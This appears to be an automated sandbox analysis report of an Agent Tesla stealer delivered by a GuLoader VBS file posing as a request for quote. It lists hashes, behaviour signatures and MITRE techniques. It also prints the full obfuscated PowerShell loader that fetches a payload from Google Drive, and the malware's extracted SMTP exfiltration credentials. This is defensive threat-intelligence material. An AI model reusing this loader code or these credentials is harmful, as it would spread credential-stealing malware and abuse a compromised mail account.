agenttesla | 86e6cd3d2fb55232cbac7aedf7a0078eecddfece6dfde4e6566216a057acacfa

General

Target

RFQ20240327_Lista commerciale.vbs
Size

39KB
MD5

9300a9eba698df3fa841738aa1ee2153
SHA1

cc76797e0fb68f86bfc3b509e0fb25b66e666f84
SHA256

86e6cd3d2fb55232cbac7aedf7a0078eecddfece6dfde4e6566216a057acacfa
SHA512

4682cc200b193fea5280a54e2007bf1158ab3ea039eec76b62e0b2a7cc2083fa4cf7d919bdfa27c3a80aa989e6eb2db458ae2d168830de7be8ff57ef3a2a0042
SSDEEP

768:u0zgB8X2WAZGc8NnKwiQwR5T1dPA1aRtg:4+QqNnKwY3BK1aRO

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
amir.hussin@inkomech.com
Password:
Amir@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
amir.hussin@inkomech.com
Password:
Amir@2021
Email To:
williamslucy570@gmail.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2676 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2552 powershell.exe
2676 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2552 set thread context of 2676 2552 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2632 powershell.exe
2552 powershell.exe
2552 powershell.exe
2676 wab.exe
2676 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2552 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2632 powershell.exe
Token: SeDebugPrivilege 2552 powershell.exe
Token: SeDebugPrivilege 2676 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org

pid	process
2676	wab.exe

pid	process
2552	powershell.exe
2676	wab.exe

description	pid	process	target process
PID 2552 set thread context of 2676	2552	powershell.exe	wab.exe

pid	process
2632	powershell.exe
2552	powershell.exe
2552	powershell.exe
2676	wab.exe
2676	wab.exe

pid	process
2552	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2676	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2256 wrote to memory of 2632	2256	WScript.exe	powershell.exe
PID 2256 wrote to memory of 2632	2256	WScript.exe	powershell.exe
PID 2256 wrote to memory of 2632	2256	WScript.exe	powershell.exe
PID 2632 wrote to memory of 2556	2632	powershell.exe	cmd.exe
PID 2632 wrote to memory of 2556	2632	powershell.exe	cmd.exe
PID 2632 wrote to memory of 2556	2632	powershell.exe	cmd.exe
PID 2632 wrote to memory of 2552	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 2552	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 2552	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 2552	2632	powershell.exe	powershell.exe
PID 2552 wrote to memory of 2360	2552	powershell.exe	cmd.exe
PID 2552 wrote to memory of 2360	2552	powershell.exe	cmd.exe
PID 2552 wrote to memory of 2360	2552	powershell.exe	cmd.exe
PID 2552 wrote to memory of 2360	2552	powershell.exe	cmd.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe
PID 2552 wrote to memory of 2676	2552	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240327_Lista commerciale.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spurrier Impressibleness Eloxering #>;$Pollinizes=(cmd /c set /A 115^^0);Function Caum231 ([String]$Afdragsordningerne){$Timeantallets=[char][int]$Pollinizes+'ubstring';$Stjsvagestes=8;$Trevlerodens=Discordous($Afdragsordningerne);For($Premutinied=7; $Premutinied -lt $Trevlerodens; $Premutinied+=$Stjsvagestes){$Svarfristers=$Afdragsordningerne.$Timeantallets.Invoke($Premutinied, 1);$Boldens=$Boldens+$Svarfristers;}$Boldens;}function Bramfriest ($Heterotrich87){& ($Studenterbrdenes) ($Heterotrich87);}function Discordous ([String]$Skolepatruljes){$Bandie=$Skolepatruljes.Length-1;$Bandie;}$Miscuing=Caum231 'UvedespT.flednir Shakysa WordstnHemiatrsModstanfSevere.e KingborMetaphyrsalmo.oiUnlegalnBrand,ogAmputer ';$Ullman=Caum231 'RassledhPseudoptSkruppptSliksunpAube.gisFlygel :Sbr.dsm/Flaadde/CruralldPedellerBeve,seiGrundvavOdouraneJenlgen.HoaryhegNecromaoObjectioHygia,tgSvullenl mpendee lyngso.Augmentc ensomho Downdrm Told,t/Coleu,euHvedebrc onexho? RepopueMinimalxRawishnpIll,tivoDimensir Unpatrtepigone=NonbioldVas,omaoDispo iwunexpl.nAkua,milProlongoFerskvaaMealilyd Consta& Bli,zkiPsittacdWaterco=Decurri1knivblaMSixpenn2 SpartaM MagtkagMicrobayReformpU amendiyO,dovicGSportslfoctonarDInhalatB,ritidsPTrskni UUsports0Volon.rSJud.ciaY,irklveHSytraa.-ErhversqArharale Kaglen2Chryd ey ShinplRBr.gervE possumc Catase9NoncommhSpecialpSociali-AfdpiecWFiskereM Bru,st0Mennes. ';$Studenterbrdenes=Caum231 'SystemaiSkyldbeeKil,eanx Attens ';$Sagvandite=Caum231 'Aktieaf$ MonchigIndh gnl ighulloLevnedsbBlendinaNerven l.orfres:RomerkiMCowardybVulpicieFordyrelPotteryeMyelenctPreconssGliskan Witcher= Miaowi KantkoShjestertSkovmyra SherryrKont.net Zeppel-ChupaktB Town eiRec protFordjeds whitenT,istendrAtomforaP risernN sturtsunwaiv.fKoenigse,evelserBravery Traneda-T,anspoSUnderaroTildigtuSpavinsrPapegjecHy.kumeeDriftss Uunetsl$unabridURookiesl AnpartlP.sheremRelegera Slgelin Acanth Raadigh-gl dedcDDobbelteConverss HulkintVoluminiBittermnEmba.loaTennisdtSprllemi ommentoT bakssn Alsidi Sognef$Kunste,SSoughler EmuncttMa,culao ChirtagPlasm,le pomelynG lachceEkvip.r ';Bramfriest (Caum231 ' nbiasa$ShantyegMa,dskalSchool oEskatolbVelariza erpetul.eputes:Doo,knoSlensedvr,rejnintTrompetoUdk mstgVandbreeKri lennBarderie Sr kre=Octodec$K rtoffePrimovinSh.neenvnaturfa:MatheaiaUnlangupPulpifipauber idHandicra ReimpltHeroisea,herbet ') ;Bramfriest (Caum231 ' IlteleIBrowbeam OmvisepConnectoNicodemrLovlig,tLyskopi-RigdomsMForespro EmprizdKaiseriuAlternalP.eposieordenss TektiteBVariatiiPrcisertunimmorsUreotelT Tronfor Ovenl,aAngstklnparorexs St,rkefDess.rte.mmortarH.lioga ') ;$Srtogene=$Srtogene+'\Opposer.Gru' ;Bramfriest (Caum231 'B,dagti$StormwagIndeleglMangfoloToug,tfbprecollaSekretdlUnder,u:Filigr.TSekskanareportirSkitseri Com,enfV,gineceSignatur Bvser iUe ighenAlloya.gMakroskeForudsir PodagrnPfuispaeDialyst= allipe( ta,belTIdriftseDriftsosGastingtcherryi-ShieldpPAktuarsaEjendomtcalibrahDuckpin Sp,tles$Ungb,anSFallitbrTeslashtUnicorno FireligLandsple ,ombaknInkbsl.eTyndsli) O.niac ') ;while (-not $Tariferingerne) {Bramfriest (Caum231 'BughindITypehusf Ule.pe Payingt( Sadelm$ BaandvMDipl mabMazopateSmi.ninlA.pergieFradragtRedir gsEspalie.Co cordJCaptbacoKrnikesbCutic,lSI,dkasttPrinsanaWhoredotKartoffe Th.ead Vandfog-Isne deeLkkestnqFiliste Formue$SkalarpM SignaliYe.aneks Hders.c Dowingu AbradiiBlackwanBonaghtgLactopr)Dip,osp Thrasos{TronfoeSSammenstBobs,edaSenecturHo sebotEmceedp-HatsshaS FragillMouskrieHulendee BaffetpCalyxd, Dekanat1nasa,is} minorieVandretl,iaarspsGhebetaeFaninkr{Brum,sbSHemmelit Arbe,daUdstdesr Trustat Arapah-CorroboSFractiol StonefeIrreligeAnkeprop No vir Glosari1Nonr.sp;CorylenBVidnefrrAssassiaE unciamPry,lecfbellboyrA,resseiAmino reStenfiss Unb actPortkom Sweetli$StoppedS Atmosfa AlveargStjernevForbrugaBorgermnF malizdForlystiAsbolitt B.gstaeAdgangs}Unburro ');Bramfriest (Caum231 'Enfever$SynodalgHampshilStillwaoNatur.ibPostrepaProtobllKultisk: Ging,rT ElectraMistyperPre.epoiBaa.dudf BagdeleHotlinerParakitiBretschnBronzergBaa evrePajahuerSikkerhn LrredseEspadon= Compli( OmredaTImmov.beProcacissu.cesstCanadis-EthnalbPSv,mepraArgentit Masconhdiv.rge Togrej$SkrmfelS flawydr VenstrtPa.torioAero,atgPol.andeUnd.rbenNdstedteRelap.e).assage ') ;}Bramfriest (Caum231 'Udskyde$.gekommgIncitorl CellaroNedturpb uperoeaHdwegy.lGenealo:DutteneGPr requiReplatedCrosslieUnyttigrOk ekds Pugmar=Slvsnor Plagu.mG ElegieeHoldbartInt ane- Vitra,C KonkuroPr.discnStorstdtKviltn.eBos,hbon hair.rtMischri Lentosu$ jehus.SUnnethirSkiwiestPentadro oiletagAstringeGarbedcnOpisthoeChining ');Bramfriest (Caum231 ' Papiri$Crowfoog AntennlImperiooLeverinbSqualoiaHemocytl Frustr:Sympa.hTRetlednj UdbyggeJaspo.dk formidk Stiftmo,fhrtunsPaginatlshetlanoPolych vArtiodaaBrobyggkUnconquiKrakeleeCirsithtPedicursheksame Strafef=Feroher Gleb er[ AfrundS .inetiyThawfrasregistrtTran naeAdelsskmPo,yple.Overc aCFilk,tao KogespnChrono,v OrdetseSprgestrSge roctMaltrak]Betalin:Beskfti:ExtravaFStanzairSemi.hroAfsvalnm,umaselBPyr,fora Introfs,ellstoeOmniloq6Matricu4Inf.rmaSmoneyletKampongrBrneforiDu,drisnFortl,eg Tonn,g(.onopro$EpispadGDoubt.oiSu.dheddbo itsieSadelgjrOvers.e)Forhand ');Bramfriest (Caum231 ' Header$ZoopsiagMiljssulUnovertoLatterlb Perkina ErklrilAeolidi:startelUTri,ngudGennem s VildkakSemipacrDottypeisvi.dlefEmpiriot Nons,nsfipplessSiliconk MindeleCount.rmDrivhusaNonowneeForeta rUndange Effendi=,rivele Konspir[ Dyhr.ySOverplyylouisinsRazoredtOvertryeSyt,enamNephili. PhanerTDrvogt e topplaxretardet Seraen. Slutb,ESthammenSto,atoccynomoro h.rdhedParcelhiVoldtgtnConjuregCounter]Subco m:Bredspe:ConstruALigatorSSlethugCCa.boniITidsflgIbitmoe,. oarseGAfskrineunu,iqut IndplaSUdpolstt .ollatr,roauctiNotkinpnCounterg Chlor (Bugbite$TasteruTStry eijFe.aerfePre,outk Brugtvk ParensoBermthesRedebi,lRheadinoIstandsv CanadiaKlodsetkDitremiiForspileKnyt entElektrisInterpl)Raads,a ');Bramfriest (Caum231 'St,ndar$WhalpnigThursdalCentretoStejfvibTitteslaTvillinlCatalin:Macros,P .enlggoMileo.elBehandleGon.olamMaillfriFormfass Ma.onis MarshfpAludraar Thearc=Trllede$E tirpaU AladdidGlazilysRaadshekStartskr KorrekiHypovitf ,ighflt olstres Fnikers HovedkkParasyne UdbldemVeldsjlasyns.uneMedreg,rZilapha.BedrertsUnre.rau Nedfotb,daptatsSemicortUnanimar Eksekui DuchesnMissuitgUntouch(Gynkol,3Nons.bs4folensf3Endazef2Cond le9 ,oreti7Am male,Enteroc3Rikoche0Apoplek5 Natur.3Pilotpr0Mariuss)Protone ');Bramfriest $Polemisspr;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2556

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spurrier Impressibleness Eloxering #>;$Pollinizes=(cmd /c set /A 115^^0);Function Caum231 ([String]$Afdragsordningerne){$Timeantallets=[char][int]$Pollinizes+'ubstring';$Stjsvagestes=8;$Trevlerodens=Discordous($Afdragsordningerne);For($Premutinied=7; $Premutinied -lt $Trevlerodens; $Premutinied+=$Stjsvagestes){$Svarfristers=$Afdragsordningerne.$Timeantallets.Invoke($Premutinied, 1);$Boldens=$Boldens+$Svarfristers;}$Boldens;}function Bramfriest ($Heterotrich87){& ($Studenterbrdenes) ($Heterotrich87);}function Discordous ([String]$Skolepatruljes){$Bandie=$Skolepatruljes.Length-1;$Bandie;}$Miscuing=Caum231 'UvedespT.flednir Shakysa WordstnHemiatrsModstanfSevere.e KingborMetaphyrsalmo.oiUnlegalnBrand,ogAmputer ';$Ullman=Caum231 'RassledhPseudoptSkruppptSliksunpAube.gisFlygel :Sbr.dsm/Flaadde/CruralldPedellerBeve,seiGrundvavOdouraneJenlgen.HoaryhegNecromaoObjectioHygia,tgSvullenl mpendee lyngso.Augmentc ensomho Downdrm Told,t/Coleu,euHvedebrc onexho? RepopueMinimalxRawishnpIll,tivoDimensir Unpatrtepigone=NonbioldVas,omaoDispo iwunexpl.nAkua,milProlongoFerskvaaMealilyd Consta& Bli,zkiPsittacdWaterco=Decurri1knivblaMSixpenn2 SpartaM MagtkagMicrobayReformpU amendiyO,dovicGSportslfoctonarDInhalatB,ritidsPTrskni UUsports0Volon.rSJud.ciaY,irklveHSytraa.-ErhversqArharale Kaglen2Chryd ey ShinplRBr.gervE possumc Catase9NoncommhSpecialpSociali-AfdpiecWFiskereM Bru,st0Mennes. ';$Studenterbrdenes=Caum231 'SystemaiSkyldbeeKil,eanx Attens ';$Sagvandite=Caum231 'Aktieaf$ MonchigIndh gnl ighulloLevnedsbBlendinaNerven l.orfres:RomerkiMCowardybVulpicieFordyrelPotteryeMyelenctPreconssGliskan Witcher= Miaowi KantkoShjestertSkovmyra SherryrKont.net Zeppel-ChupaktB Town eiRec protFordjeds whitenT,istendrAtomforaP risernN sturtsunwaiv.fKoenigse,evelserBravery Traneda-T,anspoSUnderaroTildigtuSpavinsrPapegjecHy.kumeeDriftss Uunetsl$unabridURookiesl AnpartlP.sheremRelegera Slgelin Acanth Raadigh-gl dedcDDobbelteConverss HulkintVoluminiBittermnEmba.loaTennisdtSprllemi ommentoT bakssn Alsidi Sognef$Kunste,SSoughler EmuncttMa,culao ChirtagPlasm,le pomelynG lachceEkvip.r ';Bramfriest (Caum231 ' nbiasa$ShantyegMa,dskalSchool oEskatolbVelariza erpetul.eputes:Doo,knoSlensedvr,rejnintTrompetoUdk mstgVandbreeKri lennBarderie Sr kre=Octodec$K rtoffePrimovinSh.neenvnaturfa:MatheaiaUnlangupPulpifipauber idHandicra ReimpltHeroisea,herbet ') ;Bramfriest (Caum231 ' IlteleIBrowbeam OmvisepConnectoNicodemrLovlig,tLyskopi-RigdomsMForespro EmprizdKaiseriuAlternalP.eposieordenss TektiteBVariatiiPrcisertunimmorsUreotelT Tronfor Ovenl,aAngstklnparorexs St,rkefDess.rte.mmortarH.lioga ') ;$Srtogene=$Srtogene+'\Opposer.Gru' ;Bramfriest (Caum231 'B,dagti$StormwagIndeleglMangfoloToug,tfbprecollaSekretdlUnder,u:Filigr.TSekskanareportirSkitseri Com,enfV,gineceSignatur Bvser iUe ighenAlloya.gMakroskeForudsir PodagrnPfuispaeDialyst= allipe( ta,belTIdriftseDriftsosGastingtcherryi-ShieldpPAktuarsaEjendomtcalibrahDuckpin Sp,tles$Ungb,anSFallitbrTeslashtUnicorno FireligLandsple ,ombaknInkbsl.eTyndsli) O.niac ') ;while (-not $Tariferingerne) {Bramfriest (Caum231 'BughindITypehusf Ule.pe Payingt( Sadelm$ BaandvMDipl mabMazopateSmi.ninlA.pergieFradragtRedir gsEspalie.Co cordJCaptbacoKrnikesbCutic,lSI,dkasttPrinsanaWhoredotKartoffe Th.ead Vandfog-Isne deeLkkestnqFiliste Formue$SkalarpM SignaliYe.aneks Hders.c Dowingu AbradiiBlackwanBonaghtgLactopr)Dip,osp Thrasos{TronfoeSSammenstBobs,edaSenecturHo sebotEmceedp-HatsshaS FragillMouskrieHulendee BaffetpCalyxd, Dekanat1nasa,is} minorieVandretl,iaarspsGhebetaeFaninkr{Brum,sbSHemmelit Arbe,daUdstdesr Trustat Arapah-CorroboSFractiol StonefeIrreligeAnkeprop No vir Glosari1Nonr.sp;CorylenBVidnefrrAssassiaE unciamPry,lecfbellboyrA,resseiAmino reStenfiss Unb actPortkom Sweetli$StoppedS Atmosfa AlveargStjernevForbrugaBorgermnF malizdForlystiAsbolitt B.gstaeAdgangs}Unburro ');Bramfriest (Caum231 'Enfever$SynodalgHampshilStillwaoNatur.ibPostrepaProtobllKultisk: Ging,rT ElectraMistyperPre.epoiBaa.dudf BagdeleHotlinerParakitiBretschnBronzergBaa evrePajahuerSikkerhn LrredseEspadon= Compli( OmredaTImmov.beProcacissu.cesstCanadis-EthnalbPSv,mepraArgentit Masconhdiv.rge Togrej$SkrmfelS flawydr VenstrtPa.torioAero,atgPol.andeUnd.rbenNdstedteRelap.e).assage ') ;}Bramfriest (Caum231 'Udskyde$.gekommgIncitorl CellaroNedturpb uperoeaHdwegy.lGenealo:DutteneGPr requiReplatedCrosslieUnyttigrOk ekds Pugmar=Slvsnor Plagu.mG ElegieeHoldbartInt ane- Vitra,C KonkuroPr.discnStorstdtKviltn.eBos,hbon hair.rtMischri Lentosu$ jehus.SUnnethirSkiwiestPentadro oiletagAstringeGarbedcnOpisthoeChining ');Bramfriest (Caum231 ' Papiri$Crowfoog AntennlImperiooLeverinbSqualoiaHemocytl Frustr:Sympa.hTRetlednj UdbyggeJaspo.dk formidk Stiftmo,fhrtunsPaginatlshetlanoPolych vArtiodaaBrobyggkUnconquiKrakeleeCirsithtPedicursheksame Strafef=Feroher Gleb er[ AfrundS .inetiyThawfrasregistrtTran naeAdelsskmPo,yple.Overc aCFilk,tao KogespnChrono,v OrdetseSprgestrSge roctMaltrak]Betalin:Beskfti:ExtravaFStanzairSemi.hroAfsvalnm,umaselBPyr,fora Introfs,ellstoeOmniloq6Matricu4Inf.rmaSmoneyletKampongrBrneforiDu,drisnFortl,eg Tonn,g(.onopro$EpispadGDoubt.oiSu.dheddbo itsieSadelgjrOvers.e)Forhand ');Bramfriest (Caum231 ' Header$ZoopsiagMiljssulUnovertoLatterlb Perkina ErklrilAeolidi:startelUTri,ngudGennem s VildkakSemipacrDottypeisvi.dlefEmpiriot Nons,nsfipplessSiliconk MindeleCount.rmDrivhusaNonowneeForeta rUndange Effendi=,rivele Konspir[ Dyhr.ySOverplyylouisinsRazoredtOvertryeSyt,enamNephili. PhanerTDrvogt e topplaxretardet Seraen. Slutb,ESthammenSto,atoccynomoro h.rdhedParcelhiVoldtgtnConjuregCounter]Subco m:Bredspe:ConstruALigatorSSlethugCCa.boniITidsflgIbitmoe,. oarseGAfskrineunu,iqut IndplaSUdpolstt .ollatr,roauctiNotkinpnCounterg Chlor (Bugbite$TasteruTStry eijFe.aerfePre,outk Brugtvk ParensoBermthesRedebi,lRheadinoIstandsv CanadiaKlodsetkDitremiiForspileKnyt entElektrisInterpl)Raads,a ');Bramfriest (Caum231 'St,ndar$WhalpnigThursdalCentretoStejfvibTitteslaTvillinlCatalin:Macros,P .enlggoMileo.elBehandleGon.olamMaillfriFormfass Ma.onis MarshfpAludraar Thearc=Trllede$E tirpaU AladdidGlazilysRaadshekStartskr KorrekiHypovitf ,ighflt olstres Fnikers HovedkkParasyne UdbldemVeldsjlasyns.uneMedreg,rZilapha.BedrertsUnre.rau Nedfotb,daptatsSemicortUnanimar Eksekui DuchesnMissuitgUntouch(Gynkol,3Nons.bs4folensf3Endazef2Cond le9 ,oreti7Am male,Enteroc3Rikoche0Apoplek5 Natur.3Pilotpr0Mariuss)Protone ');Bramfriest $Polemisspr;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2360

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
6df843a1954ea4e2e55352b737a4c261

SHA1
6ac705c23614b29c713d9d69e40e841606bc525f

SHA256
f44d3b86dc08c95dcb33c8d3a18a3d618912817a37e413721be97eb7ea90230f

SHA512
1354de6bb5b3a1f0696f4ddf9f504de1cb47b5d88403638923f19c0aa49bbb10727cafa3273478d2b60c9fbf36525686a406a74b00f50fb27def434560e90414

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9FB9.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KW6CRXNZP8E5HAG16ZUS.temp
Filesize
7KB

MD5
ba765be7aff6165c916f06810edd2204

SHA1
8b305d3eced76d6fd18128da7374430ae1afcdd3

SHA256
6463c0f249b1272cf1f54ec91f9f463866ffdbffc8f7a11bbcdb3a2c74f94b5a

SHA512
4e3ff069673b4681642d5cac107fb7b88c924728c2253966d93e495197115acfdd91ca95d167b47d5a05a0021e2ae8616ae4918132497986cca6098569e44dee

Download Submit
memory/2552-48-0x0000000006870000-0x000000000802B000-memory.dmp

Filesize
23.7MB

Download
memory/2552-37-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/2552-72-0x0000000006870000-0x000000000802B000-memory.dmp

Filesize
23.7MB

Download
memory/2552-38-0x0000000006870000-0x000000000802B000-memory.dmp

Filesize
23.7MB

Download
memory/2552-42-0x00000000775F0000-0x00000000776C6000-memory.dmp

Filesize
856KB

Download
memory/2552-41-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/2552-40-0x0000000077400000-0x00000000775A9000-memory.dmp

Filesize
1.7MB

Download
memory/2552-20-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/2552-16-0x0000000073440000-0x00000000739EB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-18-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/2552-17-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/2552-19-0x0000000073440000-0x00000000739EB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-39-0x0000000073440000-0x00000000739EB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-30-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/2552-33-0x0000000006870000-0x000000000802B000-memory.dmp

Filesize
23.7MB

Download
memory/2632-9-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-4-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2632-35-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-31-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-34-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-32-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-7-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-13-0x000000001BC20000-0x000000001BC32000-memory.dmp

Filesize
72KB

Download
memory/2632-11-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-12-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2632-75-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-10-0x000000001B580000-0x000000001B5A2000-memory.dmp

Filesize
136KB

Download
memory/2632-5-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/2632-6-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-36-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2676-74-0x000000006ED90000-0x000000006F47E000-memory.dmp

Filesize
6.9MB

Download
memory/2676-47-0x00000000775F0000-0x00000000776C6000-memory.dmp

Filesize
856KB

Download
memory/2676-69-0x0000000000AE0000-0x0000000001B42000-memory.dmp

Filesize
16.4MB

Download
memory/2676-71-0x00000000775F0000-0x00000000776C6000-memory.dmp

Filesize
856KB

Download
memory/2676-44-0x0000000077400000-0x00000000775A9000-memory.dmp

Filesize
1.7MB

Download
memory/2676-43-0x0000000001B50000-0x000000000330B000-memory.dmp

Filesize
23.7MB

Download
memory/2676-46-0x0000000077626000-0x0000000077627000-memory.dmp

Filesize
4KB

Download
memory/2676-76-0x00000000213D0000-0x0000000021410000-memory.dmp

Filesize
256KB

Download
memory/2676-73-0x0000000000AE0000-0x0000000000B22000-memory.dmp

Filesize
264KB

Download
memory/2676-70-0x0000000000AE0000-0x0000000001B42000-memory.dmp

Filesize
16.4MB

Download
memory/2676-77-0x0000000001B50000-0x000000000330B000-memory.dmp

Filesize
23.7MB

Download
memory/2676-80-0x000000006ED90000-0x000000006F47E000-memory.dmp

Filesize
6.9MB

Download
memory/2676-81-0x00000000213D0000-0x0000000021410000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads